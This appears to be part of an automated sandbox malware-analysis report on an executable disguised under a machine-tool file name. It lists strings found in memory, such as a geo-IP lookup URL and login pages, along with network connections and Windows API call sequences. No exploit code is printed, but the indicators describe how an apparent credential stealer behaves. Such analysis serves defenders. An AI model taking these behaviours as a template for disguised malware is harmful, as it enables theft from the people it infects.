            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eicar.org/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363A7000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036372000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187$
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000364C3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00405054 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405054
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_004030D9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_004063440_2_00406344
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_004048930_2_00404893
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0040634411_2_00406344
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0040489311_2_00404893
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011C2B011_2_0011C2B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_001152FD11_2_001152FD
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011C58411_2_0011C584
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011E79011_2_0011E790
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011C85111_2_0011C851
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011692011_2_00116920
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011CB2511_2_0011CB25
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011BB4811_2_0011BB48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011CDF411_2_0011CDF4
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00116F4811_2_00116F48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011BFE011_2_0011BFE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011F03911_2_0011F039
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011F04811_2_0011F048
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011E78111_2_0011E781
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_001137E511_2_001137E5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_001198A011_2_001198A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011297411_2_00112974
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_001139B111_2_001139B1
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011FC8C11_2_0011FC8C
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_0011BD1011_2_0011BD10
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_00113D8811_2_00113D88
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D004011_2_385D0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D10B811_2_385D10B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D89B011_2_385D89B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D92A011_2_385D92A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385DC35811_2_385DC358
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385D1E8011_2_385D1E80
